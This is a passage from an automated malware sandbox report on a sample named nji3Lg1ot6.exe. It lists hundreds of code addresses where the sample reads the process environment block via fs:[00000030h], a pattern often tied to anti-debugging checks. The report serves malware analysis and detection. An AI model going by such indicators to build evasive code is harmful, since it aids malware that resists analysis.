          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AB41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A64A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A38A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A43A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A6927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AB4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AD8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AAA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A63D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AD3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A47D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A68EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A58E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A38794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7794 mov eax, dword ptr fs:[00000030h]
